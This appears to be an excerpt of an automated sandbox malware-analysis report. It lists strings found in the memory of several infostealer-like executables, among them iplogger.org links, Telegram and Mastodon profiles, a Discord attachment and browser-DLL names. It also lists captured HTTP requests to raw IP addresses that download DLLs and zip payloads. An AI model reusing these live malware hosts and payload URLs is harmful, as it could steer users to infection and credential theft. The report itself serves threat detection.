                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.867825172.00000000031C3000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                    Source: q1wLT3xKiY.exe, 00000000.00000003.345524937.00000000020C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.company.c
                    Source: WW1.exe, 0000001F.00000003.680018131.0000000001673000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: namdoitntn.exe, 00000015.00000000.309615182.0000000000D32000.00000002.00000001.01000000.00000009.sdmp, namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000000.314893587.0000000000233000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: https://api.ip.sb/ip
                    Source: SETUP_~1.EXE, 00000028.00000002.866354989.0000000002AAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com
                    Source: SETUP_~1.EXE, 00000028.00000002.866354989.0000000002AAC000.00000004.00000800.00020000.00000000.sdmp, SETUP_~1.EXE, 00000028.00000002.866303004.0000000002AA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1006526153294618657/1009394950338781266/2.0.2-beta_Nwjkxkwv.j
                    Source: WW1.exe, 0000001F.00000003.680018131.0000000001673000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: SETUP_~1.EXE, 00000028.00000003.813175961.00000000043D9000.00000004.00000800.00020000.00000000.sdmp, SETUP_~1.EXE, 00000028.00000003.816272863.0000000004430000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cutt.ly/1XlfIu7
                    Source: SETUP_~1.EXE, 00000028.00000000.447625627.0000000000642000.00000002.00000001.01000000.00000018.sdmp, SETUP_~1.EXE, 00000028.00000002.861933908.0000000002A21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cutt.ly/IXlgfrm
                    Source: WW1.exe, 0000001F.00000003.680018131.0000000001673000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: F0geI.exe, 0000000E.00000003.390549774.0000000003CAE000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.870304762.0000000003236000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000016.00000003.372438638.00000000285A0000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000003.554787504.000000002781F000.00000004.00000800.00020000.00000000.sdmp, WW1.exe, 0000001F.00000003.680018131.0000000001673000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: WW1.exe, 0000001F.00000003.680018131.0000000001673000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: real.exe, 00000016.00000003.334829493.00000000014BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
                    Source: real.exe, 00000016.00000002.415807819.0000000001264000.00000002.00000001.01000000.0000000A.sdmp, real.exe, 00000016.00000000.310875811.0000000001264000.00000002.00000001.01000000.0000000A.sdmp, brokerius.exe, 0000001A.00000000.319293478.0000000000064000.00000002.00000001.01000000.0000000F.sdmp, brokerius.exe, 0000001A.00000002.586136354.0000000000064000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: https://freebl3.dllmozglue.dllmsvcp140.dllnss3.dllsoftokn3.dllvcruntime140.dll
                    Source: WW1.exe, 0000001F.00000002.742694757.00000000001B3000.00000002.00000001.01000000.00000013.sdmp, WW1.exe, 0000001F.00000000.344396019.00000000001B3000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: https://freebl3.dllmozglue.dllmsvcp140.dllnss3.dllsoftokn3.dllvcruntime140.dllsdkjfh134bjk1gh2
                    Source: q1wLT3xKiY.exe, 00000000.00000003.345524937.00000000020C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org$
                    Source: q1wLT3xKiY.exe, 00000000.00000003.345524937.00000000020C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org$;
                    Source: q1wLT3xKiY.exe, 00000000.00000003.345524937.00000000020C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1AA
                    Source: real.exe, 00000016.00000003.361184384.00000000285A9000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000016.00000002.502475214.00000000288A9000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000003.538480063.0000000027828000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.635846325.0000000027B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1AAmX4
                    Source: q1wLT3xKiY.exe, 00000000.00000002.388275975.0000000000731000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1AAmX4r
                    Source: q1wLT3xKiY.exe, 00000000.00000003.345524937.00000000020C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1AFh
                    Source: real.exe, 00000016.00000003.361184384.00000000285A9000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000016.00000002.502475214.00000000288A9000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000003.538480063.0000000027828000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.635846325.0000000027B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1AFmX4
                    Source: q1wLT3xKiY.exe, 00000000.00000003.345524937.00000000020C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1AG
                    Source: real.exe, 00000016.00000003.361184384.00000000285A9000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000016.00000002.502475214.00000000288A9000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000003.538480063.0000000027828000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.635846325.0000000027B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1AGmX4
                    Source: real.exe, 00000016.00000003.361184384.00000000285A9000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000016.00000002.502475214.00000000288A9000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000003.538480063.0000000027828000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.635846325.0000000027B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1AJmX4
                    Source: q1wLT3xKiY.exe, 00000000.00000002.388956868.0000000000747000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1AJmX4x
                    Source: q1wLT3xKiY.exe, 00000000.00000003.345524937.00000000020C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1AJx
                    Source: q1wLT3xKiY.exe, 00000000.00000003.345524937.00000000020C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1AK
                    Source: q1wLT3xKiY.exe, 00000000.00000003.348874687.0000000000757000.00000004.00000020.00020000.00000000.sdmp, real.exe, 00000016.00000003.361184384.00000000285A9000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000016.00000002.502475214.00000000288A9000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000003.538480063.0000000027828000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.635846325.0000000027B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1AKmX4
                    Source: q1wLT3xKiY.exe, 00000000.00000003.348874687.0000000000757000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1AKmX4.
                    Source: q1wLT3xKiY.exe, 00000000.00000003.345524937.00000000020C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1ARX
                    Source: real.exe, 00000016.00000003.361184384.00000000285A9000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000016.00000002.502475214.00000000288A9000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000003.538480063.0000000027828000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.635846325.0000000027B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1ARmX4
                    Source: q1wLT3xKiY.exe, 00000000.00000003.345524937.00000000020C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1AV
                    Source: q1wLT3xKiY.exe, 00000000.00000003.348874687.0000000000757000.00000004.00000020.00020000.00000000.sdmp, real.exe, 00000016.00000003.361184384.00000000285A9000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000016.00000002.502475214.00000000288A9000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000003.538480063.0000000027828000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.635846325.0000000027B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1AVmX4
                    Source: q1wLT3xKiY.exe, 00000000.00000003.345524937.00000000020C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1AZ
                    Source: q1wLT3xKiY.exe, 00000000.00000003.348874687.0000000000757000.00000004.00000020.00020000.00000000.sdmp, real.exe, 00000016.00000003.361184384.00000000285A9000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000016.00000002.502475214.00000000288A9000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000003.538480063.0000000027828000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.635846325.0000000027B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1AZmX4
                    Source: brokerius.exe, 0000001A.00000000.319293478.0000000000064000.00000002.00000001.01000000.0000000F.sdmp, brokerius.exe, 0000001A.00000002.586136354.0000000000064000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: https://mas.to/
                    Source: F0geI.exe, 0000000E.00000003.390549774.0000000003CAE000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.870304762.0000000003236000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000016.00000003.372438638.00000000285A0000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000003.554787504.000000002781F000.00000004.00000800.00020000.00000000.sdmp, WW1.exe, 0000001F.00000003.680018131.0000000001673000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                    Source: F0geI.exe, 0000000E.00000003.390549774.0000000003CAE000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.870304762.0000000003236000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000016.00000003.372438638.00000000285A0000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000003.554787504.000000002781F000.00000004.00000800.00020000.00000000.sdmp, WW1.exe, 0000001F.00000003.680018131.0000000001673000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                    Source: F0geI.exe, 0000000E.00000003.390549774.0000000003CAE000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000016.00000003.372438638.00000000285A0000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000003.554787504.000000002781F000.00000004.00000800.00020000.00000000.sdmp, WW1.exe, 0000001F.00000003.680018131.0000000001673000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                    Source: F0geI.exe, 0000000E.00000003.390549774.0000000003CAE000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.870304762.0000000003236000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000016.00000003.372438638.00000000285A0000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000003.554787504.000000002781F000.00000004.00000800.00020000.00000000.sdmp, WW1.exe, 0000001F.00000003.680018131.0000000001673000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                    Source: real.exe, 00000016.00000002.416499811.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                    Source: real.exe, 00000016.00000003.335719317.000000000149D000.00000004.00000020.00020000.00000000.sdmp, real.exe, 00000016.00000003.334829493.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, real.exe, 00000016.00000000.310875811.0000000001264000.00000002.00000001.01000000.0000000A.sdmp, real.exe, 00000016.00000003.334927709.00000000014CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/rembo_lab
                    Source: real.exe, 00000016.00000002.415807819.0000000001264000.00000002.00000001.01000000.0000000A.sdmp, real.exe, 00000016.00000000.310875811.0000000001264000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://t.me/rembo_labhttp://77.91.103.226:80hello0NULL%s
                    Source: real.exe, 00000016.00000003.334927709.00000000014CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/rembo_labj:hNU
                    Source: brokerius.exe, 0000001A.00000000.319293478.0000000000064000.00000002.00000001.01000000.0000000F.sdmp, brokerius.exe, 0000001A.00000002.586136354.0000000000064000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: https://t.me/v_total
                    Source: brokerius.exe, 0000001A.00000000.319293478.0000000000064000.00000002.00000001.01000000.0000000F.sdmp, brokerius.exe, 0000001A.00000002.586136354.0000000000064000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: https://t.me/v_totalhttps://mas.to/
                    Source: real.exe, 00000016.00000003.334829493.00000000014BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telegram.org/img/t_logo.png
                    Source: real.exe, 00000016.00000003.334927709.00000000014CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                    Source: real.exe, 00000016.00000003.335520526.0000000001480000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.orgZ
                    Source: F0geI.exe, 0000000E.00000003.390549774.0000000003CAE000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.870304762.0000000003236000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000016.00000003.372438638.00000000285A0000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000003.554787504.000000002781F000.00000004.00000800.00020000.00000000.sdmp, WW1.exe, 0000001F.00000003.680018131.0000000001673000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: SETUP_~1.EXE, 00000028.00000003.488237500.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                    Source: SETUP_~1.EXE, 00000028.00000003.488237500.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                    Source: unknownDNS traffic detected: queries for: iplogger.org
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_00407EDB LocalAlloc,LocalAlloc,StrStrW,lstrlenW,LocalAlloc,LocalAlloc,LocalFree,WideCharToMultiByte,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,lstrlen,lstrcpyn,LocalFree,LocalFree,GetFileSize,LocalAlloc,LocalAlloc,lstrlen,lstrcpyn,ReadFile,ReadFile,CloseHandle,LocalFree,DeleteFileW,LocalFree,LocalFree,LocalAlloc,lstrlen,lstrcpyn,lstrcpyn,lstrlen,LocalFree,InternetOpenW,InternetSetOptionW,InternetSetOptionW,InternetConnectW,HttpOpenRequestW,HttpOpenRequestW,lstrlenW,HttpSendRequestW,HttpSendRequestW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrlen,MultiByteToWideChar,MultiByteToWideChar,LocalAlloc,lstrlen,MultiByteToWideChar,MultiByteToWideChar,LocalFree,LocalFree,LocalFree,LocalFree,14_2_00407EDB
                    Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 45.95.11.158Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 45.95.11.158Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 45.95.11.158Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 45.95.11.158Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 45.95.11.158Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /1571 HTTP/1.1Host: 77.91.103.222
                    Source: global trafficHTTP traffic detected: GET /3610134416.zip HTTP/1.1Host: 77.91.103.222Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 45.95.11.158Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 45.95.11.158Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /1616 HTTP/1.1Host: 88.198.122.116
                    Source: global trafficHTTP traffic detected: GET /3478722452.zip HTTP/1.1Host: 88.198.122.116Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /1521 HTTP/1.1Host: 62.204.41.126
                    Source: global trafficHTTP traffic detected: GET /0659920757.zip HTTP/1.1Host: 62.204.41.126Cache-Control: no-cache
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50101 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 23 Aug 2022 16:26:22 GMTContent-Type: application/zipContent-Length: 3642574Last-Modified: Mon, 04 Jul 2022 10:49:28 GMTConnection: keep-aliveETag: "62c2c5b8-3794ce"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 10 6e 55 53 4b 12 b5 9b fc b5 00 00 48 47 01 00 10 00 1c 00 76 63 72 75 6e 74 69 6d 65 31 34 30 2e 64 6c 6c 55 54 09 00 03 b0 6f 71 61 b0 6f 71 61 75 78 0b 00 01 04 00 00 00 00 04 00 00 00 00 ec fd 0b 40 54 d5 bb 38 0c ef 61 06 18 71 60 46 05 45 45 1d 15 6f e1 65 98 e1 3e c3 55 06 f1 82 0e 22 e0 0d 11 b9 38 20 02 c1 1e d4 14 45 07 ca 71 37 e5 af ac ac ac 34 ad 9f 95 95 95 99 99 19 88 09 98 29 5e 32 4b 2b 34 aa 4d 43 8a 4a 80 4a ce f7 3c 6b ef 81 01 c5 73 ce ff 7d cf 7b be f7 fb 0e ba f6 65 5d 9e f5 ac 67 3d b7 b5 f6 5a 6b e2 16 6e a5 84 14 45 89 20 58 ad 14 75 88 e2 fe 22 a8 ff f8 af 19 82 db 88 c3 6e d4 81 3e df 8e 3c 24 98 f5 ed c8 79 fa ec 22 79 41 61 fe f2 c2 b4 95 f2 f4 b4 bc bc 7c 5a be 2c 53 5e 68 c8 93 67 e7 c9 a3 e7 24 c8 57 e6 67 64 4e 76 75 75 f1 e6 61 08 